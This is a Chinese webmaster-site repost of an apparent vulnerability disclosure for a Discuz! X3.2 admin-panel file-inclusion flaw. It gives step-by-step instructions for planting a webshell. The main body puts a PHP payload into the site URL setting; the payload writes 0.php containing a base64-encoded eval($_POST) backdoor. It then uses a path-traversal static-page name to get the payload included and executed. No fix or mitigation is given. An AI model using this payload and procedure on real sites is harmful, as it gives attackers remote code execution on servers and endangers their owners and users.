站长之家 - 站长资讯 - 易采站长站

当前位置: > 建站教程 > 源码教程 > 论坛程序 >

Discuz3.2后台文件包含漏洞可后台拿shell

2015-08-21 08:29 | 来源:网络整理 | 编辑:秋军 |

简要描述:

最新版本:Discuz! X3.2 Release 20140618

包括以前版本

详细说明:

由于创建专题时未对

code 区域

静态化名称

做任何限制引发此漏洞

1.全局->站点信息

网站 URL: http://www.comsenz.com/#<?php file_put_contents('0.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUW2FdKTsgPz4='));?>

Discuz3.2后台文件包含漏洞可后台拿shell

2.工具->更新缓存

Discuz3.2后台文件包含漏洞可后台拿shell

3.门户->HTML管理

静态文件扩展名: htm

专题HTML存放目录:data/cache

Discuz3.2后台文件包含漏洞可后台拿shell

4.创建专题

静态化名称[此处未做任何限制]:../../template/default/portal/portal_topic_test

Discuz3.2后台文件包含漏洞可后台拿shell

 

5.专题管理

对刚添加的专题 开启 并生成

Discuz3.2后台文件包含漏洞可后台拿shell

6.再次创建专题

模板名 选择刚生成的 ./template/default/portal/portal_topic_test.htm

提交

Discuz3.2后台文件包含漏洞可后台拿shell

就执行了php代码 <?php file_put_contents('0.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUW2FdKTsgPz4='));?>

不仅仅是可以生成到专题目录,可以生成到任何可以包含的下面!

Discuz3.2后台文件包含漏洞可后台拿shell

漏洞证明:

  • discuz x后台设置各种用户组个性签名的长度无效
  • 对不起,您安装的不是正版应用,安装程序无法继续执行 discuz
  • Discuz、UCenter登陆管理后台自动退出的解决方法
  • Discuz论坛发帖技巧分享
  • DiscuzX发帖默认隐藏附件/图片/链接/视频等设置教程
  • Discuz二次开发基本知识总结
  • 快速了解Discuz!程序文件功能
  • Discuz! X2.5与UCenter通信失败常见症状及解决方法
  • Discuz!开启使用HTML、主题分类、分类信息的方法
  • discuz 论坛注册的时候提示 内部错误,无法显示此内容的解决方法
  • 网友评论

    关于我们 - 联系我们 - 广告服务 - 版权声明 - 人才招聘 - 友情链接 - 网站地图 - 帮助 - -

    CopyRight © 2010-2016 源码下载 easck.com , All Rights Reserved

    蒙公网安备 15052402000103号

    蒙ICP备14002389-1号